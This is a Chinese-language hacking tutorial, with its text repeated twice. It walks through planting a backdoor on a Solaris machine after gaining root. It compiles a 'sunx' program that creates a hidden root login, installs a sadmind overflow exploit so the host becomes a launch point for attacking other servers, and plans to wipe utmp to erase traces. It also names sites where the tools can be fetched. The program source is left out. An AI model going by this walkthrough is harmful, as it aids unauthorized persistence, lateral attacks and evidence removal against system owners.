一.前言..
后门制作对于成功入侵后保持权限有很重要的意义,本文介绍简单的实用后门的制作技术,以及如何制作一台肉鸡.(哈哈哈~不要变成坏孩子哦!)
二.准备..
首先我们需要1.sunx 2.solaris远程溢出程序 3.wipe
以上工具可以在http://www.cnredmay.com 或者http://hlc.cnroot.com找到.
三.过程..
#id
uid=0 (root) gid=0 (root) (哈哈哈哈~~成功拿到root)
#vi sunx.c
……
……
:w
:q (保存退出vi)
#gcc -o sunx sunx.c
: command not found (昏~where is gcc)
哈哈~一般solaris主机默认没有gcc,但是管理员通常会在/usr/local/bin/下安装一个.当然我们也可以用whereis命令查找..
#whereis -b gcc
gcc:/usr/local/bin/gcc (哈哈~出来了哦~!)
#/usr/local/bin/gcc -o sunx sunx.c (编译sunx.c为可执行文件)
……(过了一会儿)
#chmod 755 sunx (设置为可执行)
#sunx （有人偷看MM洗澡澡啊~~打色狼~哈哈哈)

……
这样就安装好一个backdoor了
你可以telnet host(ftp也可以) 用sunxdoor这个用户名登陆(root权限)
作为肉鸡一定要可以作为入侵其他服务器的跳板,所以一些常见的溢出程序一定少不了.所以下一步是安装这些程序,我以sadxmind为例子.
# vi sad.c
……(程序内容省略)
:w
:q
#/usr/local/bin/gcc -o sad sad.c
#chmod 755 sad (这样就可以使用sad了)
恩~我们还缺少一样东西,哈哈~就是擦pp的东西,哈哈哈哈~~~~~~(要不然被发现就惨了,呵呵~)基本就是清除utmp

一.前言..
后门制作对于成功入侵后保持权限有很重要的意义,本文介绍简单的实用后门的制作技术,以及如何制作一台肉鸡.(哈哈哈~不要变成坏孩子哦!)
二.准备..
首先我们需要1.sunx 2.solaris远程溢出程序 3.wipe
以上工具可以在http://www.cnredmay.com 或者http://hlc.cnroot.com找到.
三.过程..
#id
uid=0 (root) gid=0 (root) (哈哈哈哈~~成功拿到root)
#vi sunx.c
……
……
:w
:q (保存退出vi)
#gcc -o sunx sunx.c
: command not found (昏~where is gcc)
哈哈~一般solaris主机默认没有gcc,但是管理员通常会在/usr/local/bin/下安装一个.当然我们也可以用whereis命令查找..
#whereis -b gcc
gcc:/usr/local/bin/gcc (哈哈~出来了哦~!)
#/usr/local/bin/gcc -o sunx sunx.c (编译sunx.c为可执行文件)
……(过了一会儿)
#chmod 755 sunx (设置为可执行)
#sunx （有人偷看MM洗澡澡啊~~打色狼~哈哈哈)

……
这样就安装好一个backdoor了
你可以telnet host(ftp也可以) 用sunxdoor这个用户名登陆(root权限)
作为肉鸡一定要可以作为入侵其他服务器的跳板,所以一些常见的溢出程序一定少不了.所以下一步是安装这些程序,我以sadxmind为例子.
# vi sad.c
……(程序内容省略)
:w
:q
#/usr/local/bin/gcc -o sad sad.c
#chmod 755 sad (这样就可以使用sad了)
恩~我们还缺少一样东西,哈哈~就是擦pp的东西,哈哈哈哈~~~~~~(要不然被发现就惨了,呵呵~)基本就是清除utmp